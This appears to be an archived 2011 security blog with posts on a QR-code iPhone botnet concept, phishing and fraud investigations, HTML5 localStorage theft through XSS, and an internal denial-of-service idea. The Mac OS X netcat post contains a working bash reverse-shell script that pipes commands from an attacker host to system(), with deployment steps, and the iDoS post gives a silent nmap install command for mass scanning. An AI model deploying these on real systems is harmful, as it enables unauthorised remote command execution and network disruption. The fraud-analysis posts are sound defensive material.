December 10, 2011

QRbot - iPhone QR botnet

Every time that new technology is revealed, lots of security researchers seek for vulnerabilities in it. In my case, I was looking for security holes in the integration between QR readers and smart phones, especially on iPhone.

Few days ago I posted an article in Pentest Magazine about QRbot . This article is related to both social engineering and cyber-crime.

Why social engineering?
Since QR usage is based on interactive actions of mobile users, which might lead to threats on their devices, as explained in detail in the article.

Why cyber-crime?
The actions taken by criminals not only harm the mobile phone/device users, but also may steal sensitive information or aid in launching massive actions using controlled, Zombie-based networks (Botnets), e.g. DDoS – Distributed Denial of Service attacks.

In order to explain the whole process, my article begins from the basics of QR and iPhone Usage. After understanding the basics, I dive into the actions needed to build a QRbot. Finally, avoidance recommendations explained.

In general, QRbot based on the following facts:
1. QR code is unreadable to human eye.
2. 6 of 10 QR readers (that I tested) are vulnerable to automatic URL redirection.
3. There is an option to upload compiled application (IPA) to IIS server.
4. iPhone runs iOS, which is a version of FreeBSD Linux (like Mac OS X).
5. Jailbroken iPhones have root privileges, while non-jailbroken iPhones run applications in a sandbox. Therefore the QRbot is limited to DDoS attacks on non-jailbroken iPhones, but there are no limitations on jailbroken iPhones, e.g. steal all GPS history, emails, contact, backup iPhone etc.

Download the full article on this page: http://pentestmag.com/pentest-starterkit-211-2/
If you are not familiar with PenTest Magazine, I suggest to check out the teser in the link above.

November 12, 2011

NC remote execution on Mac OS X

Background

Netcat is a built-in application in Mac OS X, i quote from the manual (run: man nc to get more info):
The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning, and deal with both IPv4 and IPv6. Unlike telnet(1), nc scripts nicely, and separates error messages onto standard error instead of sending them to standard output, as telnet(1) does with some.
If you downloaded netcat for windows\linux, you would see that the "-e" or "-c" flags are enabled. The meaning of this flags is that an attacker can execute commands in the system that runs the netcat with the flags above, e.g. The server executed nc -l -p [port_number] -e cmd.exe (or /bin/bash in linux), while the attacker need only to run nc [server_address] [port_number]. After connecting to the server, the attacker can run any system command in the remote server.

Issue
I was testing varios versions of netcat on my Mac OS X, none of them worked in the execution mode above. Part of you would say that Mac OS X is only a permutation of FreeBSD, however the bottom line is that it won't work.

Solution
In order to avoid the limitation of executing system commands, I developed the bash script, which reversing a connection from the attacked server to the attacking machine.
Please follow the steps below:
1. Open connection on attacker's machine. run:
nc -k -l 3333
The state should be as shown in the following screenshot:
2. Copy the source code to the file ncmac.sh on the server (I run nano ncmac.sh)
#! /bin/bash
echo 'Started NC remote execution for Mac OS X by NirV ' > ~/result
while :
do
cat ~/result | nc [attacker_ip] 3333
nc [attacker_ip] 3333 | head -n 1 | awk '{system($0); print $0}' > ~/result
done
Note: If you can't open nano because of attack limitations, another option is to "echo" the text above to file, e.g. echo "[paste above text]" > ncmac.sh
3. Run sh macsh.sh

Now the server opened a reverse connection to attacker's machine. The attacker is able to run any command, i.e. see that the result of whoami is root (instead nirv on attacker's machine):

NOTE: Sometimes the attacker needs to type the system command few times until the server responds.

April 5, 2011

Mobile Fraud by BBC-Center

Our privacy is important issue that we aware of, however sometimes we don't really know what kind of information is published over the internet or stolen by malicious attackers.
Have you ever googled your name\ eMail\ Mobile? If not - give a shot, you might find some interesting info about yourself and even expose your private information.

Use Case
My college, Regina Strakh, got the following SMS to her mobile:


What is the risk?
By replying the message, the attacker is able to build a spam list of eMails and update the activity of the mobile number since it should be sent in the mail.
In addition, the potential victim might have future steps to pay a fee for the attacker.


Following the attacker
Let's gather some information... WHOIS BBC-CENTER.ORG:


As can be seen above, The first suspicious information is the creation date of the domain. The second suspicion is registrant's eMail, which is based on gmail.
In addition, if we go to the web site of this domain, the following empty site would appear:


Of course, BBC's web site does not looks like the site above.

Let's go deeper... Who holds the nickname of the attacker? (google it)... It should be a self employed "very simple guy":


Note: It is not a sure strike, however this is the most relevant information in google.

In conclusion - It's a fraud!!!

March 24, 2011

Walla Content Issue

I was looking for some news on http://walla.co.il, however I have got the following page:


In conclusion - work carefully with production environments.

March 20, 2011

HTML5 Full LocalStorage Stealth by XSS

HTML 5 has various features, one of the is the LocalStorage. Before HTML 5, the browser used to save users' thin content in a cookie (up to 8KB), However HTML 5 allows to save more content in a storage which is limited by the developer (up to 10MB).

Is the localStorge dangerous?
As most answers for the development questions - it depends.
If a confidential information is stored on the localStorage then YES, otherwise not.
In order to illustrate, A "SessionID" should be considered as confidential since an attacker might use it in order to get access to the application.

How to steal the localStorage?
An XSS attack can be implemented in order to steal all the contents of the storage. I would like to share my sample script which steals all keys in the localStorage:



Can we protect the localStorage?
As mentioned above, confidential information can be stolen. Therefore it is recommended to save confidential information on a cookie (since it has the "HttpOnly" method). Of course, XSS prevention actions should be taken.

February 20, 2011

USA Green Card Fraud

Few days ago I have got an email that indicated that I won a green card. It looked strange since I never posted registration forms though.

The story begins - First Mail from USAFIS which includes an "intro" for a mail that I should receive from the US government, see the email content in the following image:


Few minutes later I have got a mail from "usa.gov.states@usa.com" which indicated that I won the green card and the only thing left is to pay a 880$ fee. See screenshot below:


These emails looked strange from the following reasons:
1. No contact details in both emails.
2. I never filled a form for getting a green card (should I?)
3. As far as I know - USA is a governmental site, which means that it should be ended with .GOV instead .COM

Therefore I decided to investigate this potentially fraud. Each solution for a mystery begins with one small step - Who are USAFIS? Did they sent me the email? In order to get the answers, I sent reply email with question about the winning. The reply that I got is an automatic reply which indicated that the information can be found in the second email that I have got, see screenshot:


OK, It was not enough for getting the information that I mentioned to get, therefore I googled and found the web site of usafis. I sent an email to the helpdesk and asked if I won the green card. As response I got the following email which tells me that it was a fraud:


Note: The real email from USAFIS comes from USAFIS.ORG, where the fake comes from POST.COM domain.

As for the .GOV/.COM issue, I executed whois query and found the following info about usa.com domain:



If I ran the same query on USA.GOV, I would not get any information.


In conclusion, please note the emails that you read and verify (as far as you can) the identity of the sender.

February 16, 2011

Internal Denial of Service (iDoS)

I like the traditional Denial of Service attacks which are based on the Application layer, i.e. Buffer overflows, function recursion etc. Moreover, most of the network DoS\DDoS attacks are targeted to external systems.

I would like to share an idea about execution of internal DoS (iDoS) attack on the network level. In order to explain the attack, it is important to divide the attack to 2 extremely different networks:

1. Flat Network
Flat networks allow access to all resources in the network. Let's assume that attacker finds a way to install scanning tool silently (e.g nmap with winPcap, by using nmap-x.xx-setup.exe /S /D=C:\tools\Nmap) on all\most of the remote computers, either by exploit or privileged permissions. After installation has been completed, the attacker can execute an intensive scan (paralelly or serially) on the IP range in the internal network.
As a result, the attacker can cause most of the computers in the internal network to scan the entire network, which may lead to exhaustion or denial of service in the internal network.

2. Segmented Network with IPS
In this kind of network, on one hand the attacker might infect less operating systems, on the other hand the remediation might take longer.
If an attacker implements the same attack as above on such a network, the infected resources will be locked by the IPS, which automatically will cause a denial of service to the resources above. In addition, this attack may be taken to other scenarios i.e. flooding the IPS in the network.

In order to reduce the threat I would recommend to limit the access to the internal resources (either by drive encryption, device control etc) and block scanning tools in the Antivirus software on the operating systems.
I know that my recommendations might be bypassed, however it is still a pretty good solution.


Nir Valtman